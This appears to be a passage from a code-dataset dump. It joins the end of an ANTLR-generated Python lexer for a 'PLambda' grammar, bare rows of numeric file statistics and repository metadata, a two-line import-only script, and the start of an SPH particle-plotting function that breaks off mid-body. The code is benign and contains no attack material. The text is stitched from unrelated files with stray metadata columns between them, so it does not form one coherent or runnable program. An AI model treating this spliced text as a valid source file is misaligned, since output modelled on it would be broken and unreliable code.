buf.write("]\u01a3\3\2\2\2_\u01aa\3\2\2\2a\u01b2\3\2\2\2c\u01ba\3")
buf.write("\2\2\2e\u01c1\3\2\2\2g\u01c5\3\2\2\2i\u01c8\3\2\2\2k\u01d0")
buf.write("\3\2\2\2m\u01d7\3\2\2\2o\u01de\3\2\2\2q\u01e0\3\2\2\2")
buf.write("s\u01e3\3\2\2\2u\u01ee\3\2\2\2w\u01f9\3\2\2\2y\u0211\3")
buf.write("\2\2\2{\u0213\3\2\2\2}\u0221\3\2\2\2\177\u0223\3\2\2\2")
buf.write("\u0081\u0231\3\2\2\2\u0083\u0233\3\2\2\2\u0085\u0235\3")
buf.write("\2\2\2\u0087\u0237\3\2\2\2\u0089\u0245\3\2\2\2\u008b\u0255")
buf.write("\3\2\2\2\u008d\u0264\3\2\2\2\u008f\u0090\7*\2\2\u0090")
buf.write("\4\3\2\2\2\u0091\u0092\7+\2\2\u0092\6\3\2\2\2\u0093\u0096")
buf.write("\5\177@\2\u0094\u0096\5{>\2\u0095\u0093\3\2\2\2\u0095")
buf.write("\u0094\3\2\2\2\u0096\b\3\2\2\2\u0097\u009b\5\63\32\2\u0098")
buf.write("\u009b\5\61\31\2\u0099\u009b\5/\30\2\u009a\u0097\3\2\2")
buf.write("\2\u009a\u0098\3\2\2\2\u009a\u0099\3\2\2\2\u009b\n\3\2")
buf.write("\2\2\u009c\u00a8\5I%\2\u009d\u00a8\5A!\2\u009e\u00a8\5")
buf.write("C\"\2\u009f\u00a8\5\67\34\2\u00a0\u00a8\59\35\2\u00a1")
buf.write("\u00a8\5;\36\2\u00a2\u00a8\5=\37\2\u00a3\u00a8\5? \2\u00a4")
buf.write("\u00a8\5\65\33\2\u00a5\u00a8\5E#\2\u00a6\u00a8\5G$\2\u00a7")
buf.write("\u009c\3\2\2\2\u00a7\u009d\3\2\2\2\u00a7\u009e\3\2\2\2")
buf.write("\u00a7\u009f\3\2\2\2\u00a7\u00a0\3\2\2\2\u00a7\u00a1\3")
buf.write("\2\2\2\u00a7\u00a2\3\2\2\2\u00a7\u00a3\3\2\2\2\u00a7\u00a4")
buf.write("\3\2\2\2\u00a7\u00a5\3\2\2\2\u00a7\u00a6\3\2\2\2\u00a8")
buf.write("\f\3\2\2\2\u00a9\u00b9\t\2\2\2\u00aa\u00ab\7>\2\2\u00ab")
buf.write("\u00b9\7?\2\2\u00ac\u00ad\7@\2\2\u00ad\u00b9\7?\2\2\u00ae")
buf.write("\u00b9\5Q)\2\u00af\u00b9\5S*\2\u00b0\u00b1\7?\2\2\u00b1")
buf.write("\u00b9\7?\2\2\u00b2\u00b9\7?\2\2\u00b3\u00b4\7#\2\2\u00b4")
buf.write("\u00b9\7?\2\2\u00b5\u00b9\5O(\2\u00b6\u00b9\5W,\2\u00b7")
buf.write("\u00b9\5U+\2\u00b8\u00a9\3\2\2\2\u00b8\u00aa\3\2\2\2\u00b8")
buf.write("\u00ac\3\2\2\2\u00b8\u00ae\3\2\2\2\u00b8\u00af\3\2\2\2")
buf.write("\u00b8\u00b0\3\2\2\2\u00b8\u00b2\3\2\2\2\u00b8\u00b3\3")
buf.write("\2\2\2\u00b8\u00b5\3\2\2\2\u00b8\u00b6\3\2\2\2\u00b8\u00b7")
buf.write("\3\2\2\2\u00b9\16\3\2\2\2\u00ba\u00c0\5Y-\2\u00bb\u00c0")
buf.write("\5[.\2\u00bc\u00c0\5]/\2\u00bd\u00c0\5_\60\2\u00be\u00c0")
buf.write("\5a\61\2\u00bf\u00ba\3\2\2\2\u00bf\u00bb\3\2\2\2\u00bf")
buf.write("\u00bc\3\2\2\2\u00bf\u00bd\3\2\2\2\u00bf\u00be\3\2\2\2")
buf.write("\u00c0\20\3\2\2\2\u00c1\u00c8\5c\62\2\u00c2\u00c8\5e\63")
buf.write("\2\u00c3\u00c8\5g\64\2\u00c4\u00c8\5i\65\2\u00c5\u00c8")
buf.write("\5k\66\2\u00c6\u00c8\5m\67\2\u00c7\u00c1\3\2\2\2\u00c7")
buf.write("\u00c2\3\2\2\2\u00c7\u00c3\3\2\2\2\u00c7\u00c4\3\2\2\2")
buf.write("\u00c7\u00c5\3\2\2\2\u00c7\u00c6\3\2\2\2\u00c8\22\3\2")
buf.write("\2\2\u00c9\u00ca\5o8\2\u00ca\24\3\2\2\2\u00cb\u00ce\5")
buf.write("q9\2\u00cc\u00ce\5s:\2\u00cd\u00cb\3\2\2\2\u00cd\u00cc")
buf.write("\3\2\2\2\u00ce\26\3\2\2\2\u00cf\u00d0\7P\2\2\u00d0\u00d1")
buf.write("\7q\2\2\u00d1\u00d2\7p\2\2\u00d2\u00d3\7g\2\2\u00d3\30")
buf.write("\3\2\2\2\u00d4\u00d5\t\3\2\2\u00d5\u00d6\t\4\2\2\u00d6")
buf.write("\u00d7\t\5\2\2\u00d7\32\3\2\2\2\u00d8\u00d9\t\6\2\2\u00d9")
buf.write("\u00da\t\7\2\2\u00da\34\3\2\2\2\u00db\u00dc\t\b\2\2\u00dc")
buf.write("\u00dd\t\4\2\2\u00dd\u00de\t\t\2\2\u00de\36\3\2\2\2\u00df")
buf.write("\u00e0\t\6\2\2\u00e0\u00e1\t\4\2\2\u00e1\u00e2\t\n\2\2")
buf.write("\u00e2\u00e3\t\13\2\2\u00e3\u00e4\t\f\2\2\u00e4\u00e5")
buf.write("\t\4\2\2\u00e5 \3\2\2\2\u00e6\u00e7\t\b\2\2\u00e7\u00e8")
buf.write("\t\r\2\2\u00e8\u00e9\t\16\2\2\u00e9\u00ea\t\17\2\2\u00ea")
buf.write("\u00eb\t\6\2\2\u00eb\u00ec\t\r\2\2\u00ec\"\3\2\2\2\u00ed")
buf.write("\u00ee\t\r\2\2\u00ee\u00ef\t\20\2\2\u00ef\u00f0\t\20\2")
buf.write("\2\u00f0\u00f1\t\b\2\2\u00f1\u00f2\t\21\2\2\u00f2$\3\2")
buf.write("\2\2\u00f3\u00f4\t\13\2\2\u00f4\u00f5\t\f\2\2\u00f5\u00f6")
buf.write("\t\22\2\2\u00f6\u00f7\t\7\2\2\u00f7\u00f8\t\23\2\2\u00f8")
buf.write("\u00f9\t\4\2\2\u00f9&\3\2\2\2\u00fa\u00fb\t\3\2\2\u00fb")
buf.write("\u00fc\t\13\2\2\u00fc\u00fd\t\f\2\2\u00fd\u00fe\t\22\2")
buf.write("\2\u00fe\u00ff\t\7\2\2\u00ff\u0100\t\23\2\2\u0100\u0101")
buf.write("\t\4\2\2\u0101(\3\2\2\2\u0102\u0103\t\n\2\2\u0103\u0104")
buf.write("\t\7\2\2\u0104\u0105\t\24\2\2\u0105*\3\2\2\2\u0106\u0107")
buf.write("\t\t\2\2\u0107\u0108\t\24\2\2\u0108\u0109\t\21\2\2\u0109")
buf.write(",\3\2\2\2\u010a\u010b\t\25\2\2\u010b\u010c\t\r\2\2\u010c")
buf.write("\u010d\t\t\2\2\u010d\u010e\t\25\2\2\u010e\u010f\t\26\2")
buf.write("\2\u010f.\3\2\2\2\u0110\u0111\t\17\2\2\u0111\u0112\t\7")
buf.write("\2\2\u0112\u0113\t\7\2\2\u0113\u0114\t\b\2\2\u0114\u0115")
buf.write("\t\4\2\2\u0115\u0116\t\r\2\2\u0116\u0117\t\f\2\2\u0117")
buf.write("\60\3\2\2\2\u0118\u0119\t\n\2\2\u0119\u011a\t\b\2\2\u011a")
buf.write("\u011b\t\7\2\2\u011b\u011c\t\r\2\2\u011c\u011d\t\t\2\2")
buf.write("\u011d\62\3\2\2\2\u011e\u011f\t\13\2\2\u011f\u0120\t\f")
buf.write("\2\2\u0120\u0121\t\t\2\2\u0121\64\3\2\2\2\u0122\u0123")
buf.write("\t\b\2\2\u0123\u0124\t\7\2\2\u0124\u0125\t\r\2\2\u0125")
buf.write("\u0126\t\6\2\2\u0126\66\3\2\2\2\u0127\u0128\t\13\2\2\u0128")
buf.write("\u0129\t\16\2\2\u0129\u012a\t\20\2\2\u012a\u012b\t\7\2")
buf.write("\2\u012b\u012c\t\24\2\2\u012c\u012d\t\t\2\2\u012d8\3\2")
buf.write("\2\2\u012e\u012f\t\13\2\2\u012f\u0130\t\3\2\2\u0130\u0131")
buf.write("\t\f\2\2\u0131\u0132\t\7\2\2\u0132\u0133\t\f\2\2\u0133")
buf.write("\u0134\t\4\2\2\u0134:\3\2\2\2\u0135\u0136\t\13\2\2\u0136")
buf.write("\u0137\t\3\2\2\u0137\u0138\t\7\2\2\u0138\u0139\t\17\2")
buf.write("\2\u0139\u013a\t\27\2\2\u013a\u013b\t\4\2\2\u013b\u013c")
buf.write("\t\25\2\2\u013c\u013d\t\t\2\2\u013d<\3\2\2\2\u013e\u013f")
buf.write("\t\13\2\2\u013f\u0140\t\3\2\2\u0140\u0141\t\13\2\2\u0141")
buf.write("\u0142\t\f\2\2\u0142\u0143\t\t\2\2\u0143>\3\2\2\2\u0144")
buf.write("\u0145\t\13\2\2\u0145\u0146\t\3\2\2\u0146\u0147\t\n\2")
buf.write("\2\u0147\u0148\t\b\2\2\u0148\u0149\t\7\2\2\u0149\u014a")
buf.write("\t\r\2\2\u014a\u014b\t\t\2\2\u014b@\3\2\2\2\u014c\u014d")
buf.write("\t\30\2\2\u014d\u014e\t\4\2\2\u014e\u014f\t\t\2\2\u014f")
buf.write("\u0150\t\31\2\2\u0150\u0151\t\13\2\2\u0151\u0152\t\6\2")
buf.write("\2\u0152B\3\2\2\2\u0153\u0154\t\30\2\2\u0154\u0155\t\b")
buf.write("\2\2\u0155\u0156\t\7\2\2\u0156\u0157\t\17\2\2\u0157\u0158")
buf.write("\t\r\2\2\u0158\u0159\t\b\2\2\u0159D\3\2\2\2\u015a\u015b")
buf.write("\t\f\2\2\u015b\u015c\t\7\2\2\u015c\u015d\t\t\2\2\u015d")
buf.write("F\3\2\2\2\u015e\u015f\t\t\2\2\u015f\u0160\t\26\2\2\u0160")
buf.write("\u0161\t\24\2\2\u0161\u0162\t\7\2\2\u0162\u0163\t\32\2")
buf.write("\2\u0163H\3\2\2\2\u0164\u0165\t\n\2\2\u0165\u0166\t\4")
buf.write("\2\2\u0166\u0167\t\t\2\2\u0167\u0168\t\25\2\2\u0168\u0169")
buf.write("\t\26\2\2\u0169J\3\2\2\2\u016a\u016b\t\f\2\2\u016b\u016c")
buf.write("\t\r\2\2\u016c\u016d\t\24\2\2\u016d\u016e\t\24\2\2\u016e")
buf.write("\u016f\t\7\2\2\u016f\u0170\t\32\2\2\u0170L\3\2\2\2\u0171")
buf.write("\u0172\t\13\2\2\u0172\u0173\t\f\2\2\u0173\u0174\t\3\2")
buf.write("\2\u0174\u0175\t\t\2\2\u0175\u0176\t\r\2\2\u0176\u0177")
buf.write("\t\f\2\2\u0177\u0178\t\25\2\2\u0178\u0179\t\4\2\2\u0179")
buf.write("\u017a\t\7\2\2\u017a\u017b\t\n\2\2\u017bN\3\2\2\2\u017c")
buf.write("\u017d\t\30\2\2\u017d\u017e\t\4\2\2\u017e\u017f\t\t\2")
buf.write("\2\u017fP\3\2\2\2\u0180\u0181\t\13\2\2\u0181\u0182\t\f")
buf.write("\2\2\u0182R\3\2\2\2\u0183\u0184\t\13\2\2\u0184\u0185\t")
buf.write("\3\2\2\u0185T\3\2\2\2\u0186\u0187\t\b\2\2\u0187\u0188")
buf.write("\t\7\2\2\u0188\u0189\t\7\2\2\u0189\u018a\t\23\2\2\u018a")
buf.write("\u018b\t\31\2\2\u018b\u018c\t\20\2\2\u018cV\3\2\2\2\u018d")
buf.write("\u018e\t\3\2\2\u018e\u018f\t\4\2\2\u018f\u0190\t\t\2\2")
buf.write("\u0190\u0191\t\31\2\2\u0191\u0192\t\13\2\2\u0192\u0193")
buf.write("\t\6\2\2\u0193X\3\2\2\2\u0194\u0195\t\23\2\2\u0195\u0196")
buf.write("\t\32\2\2\u0196\u0197\t\r\2\2\u0197\u0198\t\20\2\2\u0198")
buf.write("\u0199\t\20\2\2\u0199\u019a\t\b\2\2\u019a\u019b\t\21\2")
buf.write("\2\u019bZ\3\2\2\2\u019c\u019d\t\16\2\2\u019d\u019e\t\7")
buf.write("\2\2\u019e\u019f\t\6\2\2\u019f\u01a0\t\13\2\2\u01a0\u01a1")
buf.write("\t\n\2\2\u01a1\u01a2\t\21\2\2\u01a2\\\3\2\2\2\u01a3\u01a4")
buf.write("\t\31\2\2\u01a4\u01a5\t\20\2\2\u01a5\u01a6\t\6\2\2\u01a6")
buf.write("\u01a7\t\r\2\2\u01a7\u01a8\t\t\2\2\u01a8\u01a9\t\4\2\2")
buf.write("\u01a9^\3\2\2\2\u01aa\u01ab\t\3\2\2\u01ab\u01ac\t\31\2")
buf.write("\2\u01ac\u01ad\t\20\2\2\u01ad\u01ae\t\6\2\2\u01ae\u01af")
buf.write("\t\r\2\2\u01af\u01b0\t\t\2\2\u01b0\u01b1\t\4\2\2\u01b1")
buf.write("`\3\2\2\2\u01b2\u01b3\t\3\2\2\u01b3\u01b4\t\4\2\2\u01b4")
buf.write("\u01b5\t\t\2\2\u01b5\u01b6\t\r\2\2\u01b6\u01b7\t\t\2\2")
buf.write("\u01b7\u01b8\t\t\2\2\u01b8\u01b9\t\24\2\2\u01b9b\3\2\2")
buf.write("\2\u01ba\u01bb\t\25\2\2\u01bb\u01bc\t\7\2\2\u01bc\u01bd")
buf.write("\t\f\2\2\u01bd\u01be\t\25\2\2\u01be\u01bf\t\r\2\2\u01bf")
buf.write("\u01c0\t\t\2\2\u01c0d\3\2\2\2\u01c1\u01c2\t\r\2\2\u01c2")
buf.write("\u01c3\t\f\2\2\u01c3\u01c4\t\6\2\2\u01c4f\3\2\2\2\u01c5")
buf.write("\u01c6\t\7\2\2\u01c6\u01c7\t\24\2\2\u01c7h\3\2\2\2\u01c8")
buf.write("\u01c9\t\16\2\2\u01c9\u01ca\t\23\2\2\u01ca\u01cb\t\t\2")
buf.write("\2\u01cb\u01cc\t\31\2\2\u01cc\u01cd\t\20\2\2\u01cd\u01ce")
buf.write("\t\b\2\2\u01ce\u01cf\t\4\2\2\u01cfj\3\2\2\2\u01d0\u01d1")
buf.write("\t\16\2\2\u01d1\u01d2\t\23\2\2\u01d2\u01d3\t\b\2\2\u01d3")
buf.write("\u01d4\t\13\2\2\u01d4\u01d5\t\3\2\2\u01d5\u01d6\t\t\2")
buf.write("\2\u01d6l\3\2\2\2\u01d7\u01d8\t\16\2\2\u01d8\u01d9\t\23")
buf.write("\2\2\u01d9\u01da\t\6\2\2\u01da\u01db\t\13\2\2\u01db\u01dc")
buf.write("\t\25\2\2\u01dc\u01dd\t\t\2\2\u01ddn\3\2\2\2\u01de\u01df")
buf.write("\7/\2\2\u01dfp\3\2\2\2\u01e0\u01e1\t\13\2\2\u01e1\u01e2")
buf.write("\t\n\2\2\u01e2r\3\2\2\2\u01e3\u01e4\t\30\2\2\u01e4\u01e5")
buf.write("\t\4\2\2\u01e5\u01e6\t\t\2\2\u01e6\u01e7\t\r\2\2\u01e7")
buf.write("\u01e8\t\t\2\2\u01e8\u01e9\t\t\2\2\u01e9\u01ea\t\24\2")
buf.write("\2\u01eat\3\2\2\2\u01eb\u01ef\5\u0085C\2\u01ec\u01ef\5")
buf.write("\u0083B\2\u01ed\u01ef\5y=\2\u01ee\u01eb\3\2\2\2\u01ee")
buf.write("\u01ec\3\2\2\2\u01ee\u01ed\3\2\2\2\u01ef\u01f5\3\2\2\2")
buf.write("\u01f0\u01f4\5\u0083B\2\u01f1\u01f4\5y=\2\u01f2\u01f4")
buf.write("\5\u0085C\2\u01f3\u01f0\3\2\2\2\u01f3\u01f1\3\2\2\2\u01f3")
buf.write("\u01f2\3\2\2\2\u01f4\u01f7\3\2\2\2\u01f5\u01f3\3\2\2\2")
buf.write("\u01f5\u01f6\3\2\2\2\u01f6v\3\2\2\2\u01f7\u01f5\3\2\2")
buf.write("\2\u01f8\u01fa\7/\2\2\u01f9\u01f8\3\2\2\2\u01f9\u01fa")
buf.write("\3\2\2\2\u01fa\u020f\3\2\2\2\u01fb\u01fd\7\60\2\2\u01fc")
buf.write("\u01fe\5y=\2\u01fd\u01fc\3\2\2\2\u01fe\u01ff\3\2\2\2\u01ff")
buf.write("\u01fd\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0210\3\2\2\2")
buf.write("\u0201\u0203\5y=\2\u0202\u0201\3\2\2\2\u0203\u0204\3\2")
buf.write("\2\2\u0204\u0202\3\2\2\2\u0204\u0205\3\2\2\2\u0205\u020d")
buf.write("\3\2\2\2\u0206\u020a\7\60\2\2\u0207\u0209\5y=\2\u0208")
buf.write("\u0207\3\2\2\2\u0209\u020c\3\2\2\2\u020a\u0208\3\2\2\2")
buf.write("\u020a\u020b\3\2\2\2\u020b\u020e\3\2\2\2\u020c\u020a\3")
buf.write("\2\2\2\u020d\u0206\3\2\2\2\u020d\u020e\3\2\2\2\u020e\u0210")
buf.write("\3\2\2\2\u020f\u01fb\3\2\2\2\u020f\u0202\3\2\2\2\u0210")
buf.write("x\3\2\2\2\u0211\u0212\t\33\2\2\u0212z\3\2\2\2\u0213\u0218")
buf.write("\7)\2\2\u0214\u0217\5}?\2\u0215\u0217\13\2\2\2\u0216\u0214")
buf.write("\3\2\2\2\u0216\u0215\3\2\2\2\u0217\u021a\3\2\2\2\u0218")
buf.write("\u0219\3\2\2\2\u0218\u0216\3\2\2\2\u0219\u021b\3\2\2\2")
buf.write("\u021a\u0218\3\2\2\2\u021b\u021c\7)\2\2\u021c|\3\2\2\2")
buf.write("\u021d\u021e\7^\2\2\u021e\u0222\7)\2\2\u021f\u0220\7^")
buf.write("\2\2\u0220\u0222\7^\2\2\u0221\u021d\3\2\2\2\u0221\u021f")
buf.write("\3\2\2\2\u0222~\3\2\2\2\u0223\u0228\7$\2\2\u0224\u0227")
buf.write("\5\u0081A\2\u0225\u0227\13\2\2\2\u0226\u0224\3\2\2\2\u0226")
buf.write("\u0225\3\2\2\2\u0227\u022a\3\2\2\2\u0228\u0229\3\2\2\2")
buf.write("\u0228\u0226\3\2\2\2\u0229\u022b\3\2\2\2\u022a\u0228\3")
buf.write("\2\2\2\u022b\u022c\7$\2\2\u022c\u0080\3\2\2\2\u022d\u022e")
buf.write("\7^\2\2\u022e\u0232\7$\2\2\u022f\u0230\7^\2\2\u0230\u0232")
buf.write("\7^\2\2\u0231\u022d\3\2\2\2\u0231\u022f\3\2\2\2\u0232")
buf.write("\u0082\3\2\2\2\u0233\u0234\t\34\2\2\u0234\u0084\3\2\2")
buf.write("\2\u0235\u0236\t\35\2\2\u0236\u0086\3\2\2\2\u0237\u023b")
buf.write("\7=\2\2\u0238\u023a\13\2\2\2\u0239\u0238\3\2\2\2\u023a")
buf.write("\u023d\3\2\2\2\u023b\u023c\3\2\2\2\u023b\u0239\3\2\2\2")
buf.write("\u023c\u023f\3\2\2\2\u023d\u023b\3\2\2\2\u023e\u0240\7")
buf.write("\17\2\2\u023f\u023e\3\2\2\2\u023f\u0240\3\2\2\2\u0240")
buf.write("\u0241\3\2\2\2\u0241\u0242\7\f\2\2\u0242\u0243\3\2\2\2")
buf.write("\u0243\u0244\bD\2\2\u0244\u0088\3\2\2\2\u0245\u0246\7")
buf.write("\61\2\2\u0246\u0247\7\61\2\2\u0247\u024b\3\2\2\2\u0248")
buf.write("\u024a\13\2\2\2\u0249\u0248\3\2\2\2\u024a\u024d\3\2\2")
buf.write("\2\u024b\u024c\3\2\2\2\u024b\u0249\3\2\2\2\u024c\u024f")
buf.write("\3\2\2\2\u024d\u024b\3\2\2\2\u024e\u0250\7\17\2\2\u024f")
buf.write("\u024e\3\2\2\2\u024f\u0250\3\2\2\2\u0250\u0251\3\2\2\2")
buf.write("\u0251\u0252\7\f\2\2\u0252\u0253\3\2\2\2\u0253\u0254\b")
buf.write("E\2\2\u0254\u008a\3\2\2\2\u0255\u0256\7\61\2\2\u0256\u0257")
buf.write("\7,\2\2\u0257\u025b\3\2\2\2\u0258\u025a\13\2\2\2\u0259")
buf.write("\u0258\3\2\2\2\u025a\u025d\3\2\2\2\u025b\u025c\3\2\2\2")
buf.write("\u025b\u0259\3\2\2\2\u025c\u025e\3\2\2\2\u025d\u025b\3")
buf.write("\2\2\2\u025e\u025f\7,\2\2\u025f\u0260\7\61\2\2\u0260\u0261")
buf.write("\3\2\2\2\u0261\u0262\bF\2\2\u0262\u008c\3\2\2\2\u0263")
buf.write("\u0265\t\36\2\2\u0264\u0263\3\2\2\2\u0265\u0266\3\2\2")
buf.write("\2\u0266\u0264\3\2\2\2\u0266\u0267\3\2\2\2\u0267\u0268")
buf.write("\3\2\2\2\u0268\u0269\bG\2\2\u0269\u008e\3\2\2\2\37\2\u0095")
buf.write("\u009a\u00a7\u00b8\u00bf\u00c7\u00cd\u01ee\u01f3\u01f5")
buf.write("\u01f9\u01ff\u0204\u020a\u020d\u020f\u0216\u0218\u0221")
buf.write("\u0226\u0228\u0231\u023b\u023f\u024b\u024f\u025b\u0266")
buf.write("\3\b\2\2")
return buf.getvalue()
class PLambdaLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
STRING = 3
PRIMITIVE_DATA_OP = 4
UNARY_OP = 5
BINARY_OP = 6
TERNARY_OP = 7
N_ARY_OP = 8
AMBI1_OP = 9
AMBI2_OP = 10
NONE = 11
SEQ = 12
DO = 13
LET = 14
DEFINE = 15
LAMBDA = 16
APPLY = 17
INVOKE = 18
SINVOKE = 19
FOR = 20
TRY = 21
CATCH = 22
BOOLEAN = 23
FLOAT = 24
INT = 25
LOAD = 26
IMPORT = 27
ISNONE = 28
ISOBJECT = 29
ISINT = 30
ISFLOAT = 31
GETUID = 32
GLOBAL = 33
NOT = 34
THROW = 35
FETCH = 36
NARROW = 37
INSTANCEOF = 38
GET = 39
IN = 40
IS = 41
LOOKUP = 42
SETUID = 43
KWAPPLY = 44
MODIFY = 45
UPDATE = 46
SUPDATE = 47
SETATTR = 48
CONCAT = 49
AND = 50
OR = 51
MKTUPLE = 52
MKLIST = 53
MKDICT = 54
MINUS = 55
IF = 56
GETATTR = 57
ID = 58
NUMBER = 59
STRING_SQ = 60
STRING_DQ = 61
SYMBOL = 62
LINE_COMMENT = 63
NEW_LINE_COMMENT = 64
NEW_COMMENT = 65
WHITE_SPACE = 66
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'('", "')'", "'None'", "'-'" ]
symbolicNames = [ "<INVALID>",
"STRING", "PRIMITIVE_DATA_OP", "UNARY_OP", "BINARY_OP", "TERNARY_OP",
"N_ARY_OP", "AMBI1_OP", "AMBI2_OP", "NONE", "SEQ", "DO", "LET",
"DEFINE", "LAMBDA", "APPLY", "INVOKE", "SINVOKE", "FOR", "TRY",
"CATCH", "BOOLEAN", "FLOAT", "INT", "LOAD", "IMPORT", "ISNONE",
"ISOBJECT", "ISINT", "ISFLOAT", "GETUID", "GLOBAL", "NOT", "THROW",
"FETCH", "NARROW", "INSTANCEOF", "GET", "IN", "IS", "LOOKUP",
"SETUID", "KWAPPLY", "MODIFY", "UPDATE", "SUPDATE", "SETATTR",
"CONCAT", "AND", "OR", "MKTUPLE", "MKLIST", "MKDICT", "MINUS",
"IF", "GETATTR", "ID", "NUMBER", "STRING_SQ", "STRING_DQ", "SYMBOL",
"LINE_COMMENT", "NEW_LINE_COMMENT", "NEW_COMMENT", "WHITE_SPACE" ]
ruleNames = [ "T__0", "T__1", "STRING", "PRIMITIVE_DATA_OP", "UNARY_OP",
"BINARY_OP", "TERNARY_OP", "N_ARY_OP", "AMBI1_OP", "AMBI2_OP",
"NONE", "SEQ", "DO", "LET", "DEFINE", "LAMBDA", "APPLY",
"INVOKE", "SINVOKE", "FOR", "TRY", "CATCH", "BOOLEAN",
"FLOAT", "INT", "LOAD", "IMPORT", "ISNONE", "ISOBJECT",
"ISINT", "ISFLOAT", "GETUID", "GLOBAL", "NOT", "THROW",
"FETCH", "NARROW", "INSTANCEOF", "GET", "IN", "IS", "LOOKUP",
"SETUID", "KWAPPLY", "MODIFY", "UPDATE", "SUPDATE", "SETATTR",
"CONCAT", "AND", "OR", "MKTUPLE", "MKLIST", "MKDICT",
"MINUS", "IF", "GETATTR", "ID", "NUMBER", "DIGIT", "STRING_SQ",
"ESCAPE_SQ", "STRING_DQ", "ESCAPE_DQ", "LETTER", "SYMBOL",
"LINE_COMMENT", "NEW_LINE_COMMENT", "NEW_COMMENT", "WHITE_SPACE" ]
grammarFileName = "PLambda.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.8")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
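A tokenisation sketch for the generated lexer above, using the standard antlr4-python3-runtime entry points; the input string is a made-up PLambda expression, since the grammar itself is not shown here:

from antlr4 import InputStream, CommonTokenStream

lexer = PLambdaLexer(InputStream("(let (x 1) x)"))  # hypothetical input
tokens = CommonTokenStream(lexer)
tokens.fill()  # run the lexer to EOF
for tok in tokens.tokens:
    print(tok.type, repr(tok.text))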
| 61.75895
| 103
| 0.568652
| 5,963
| 25,877
| 2.454805
| 0.143384
| 0.128433
| 0.067837
| 0.07706
| 0.269982
| 0.20966
| 0.124676
| 0.108963
| 0.103566
| 0.101107
| 0
| 0.347026
| 0.145767
| 25,877
| 418
| 104
| 61.906699
| 0.315178
| 0.001468
| 0
| 0.015
| 1
| 0.6075
| 0.640759
| 0.60151
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005
| false
| 0
| 0.0175
| 0
| 0.2125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a51c7ebdcc1329a88abc56ae0199dbfac04761c6
| 29
|
py
|
Python
|
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | null | null | null |
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | null | null | null |
scripts/ope.py
|
woowonjin/Reinforcement_Leraning_for_Optimal_Sepsis_Treatment
|
caf78cf5406194868e40ecc5e1a30d8b060fce18
|
[
"MIT"
] | 1
|
2022-02-04T10:42:09.000Z
|
2022-02-04T10:42:09.000Z
|
import numpy as np
import os
| 9.666667
| 18
| 0.793103
| 6
| 29
| 3.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 29
| 2
| 19
| 14.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eb5ba0696311237724207df2c2a947719a884c56
| 9,956
|
py
|
Python
|
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
src/plotParticles.py
|
rubenpersicot/mouving_boundaries
|
efa263748b5ff9747db2e8d60ef981e8aa1dadaa
|
[
"MIT"
] | null | null | null |
###########################################################################
###########################################################################
# SPyH
###########################################################################
###########################################################################
#Authors : R. Carmigniani & D. Violeau
#Version : SPyH.0
#Contact : remi.carmigniani@enpc.fr
###########################################################################
# Some useful imports
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['text.usetex'] = True
matplotlib.rc('text', usetex=True)
from matplotlib.patches import Polygon
from matplotlib.collections import PolyCollection
from matplotlib.collections import PatchCollection
import matplotlib.colorbar as cbar
import matplotlib.cm
from src.spyh import *
from src.sphvar import *
def plotPropertiesWithBound(part,partProp,nameBar,bounds,dr,PARTFIG):
    '''
    input :
        -part : list of particles
        -partProp : array of data to display
        -nameBar : legend for the bar color
        -bounds :
            [xMin,xMax,yMin,yMax,propMin, propMax] the bound of the domain and color bar
        -PARTFIG : the ID of the plot
    output :
        -display a png image of the simulation but does not save it
    '''
    if len(bounds)==6:
        xMin = bounds[0]
        xMax = bounds[1]
        yMin = bounds[2]
        yMax = bounds[3]
        propMin = bounds[4]
        propMax = bounds[5]
    else:
        print('Error the bounds should have 6 inputs!!! check plotParticles function')
        return
    #Create a colormap
    def f_color_map(x):
        Nstep = 100
        jet = matplotlib.cm.get_cmap('jet',Nstep)
        return jet((x-propMin)/(propMax-propMin))
    cmap = plt.cm.jet
    normal = plt.Normalize(propMin,propMax) # my numbers from 0-1
    infoTab = part[:,INFO]
    cnts = part[infoTab==FLUID][:,POS]
    offs = np.ones([4,len(cnts),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_fluid = cnts + offs
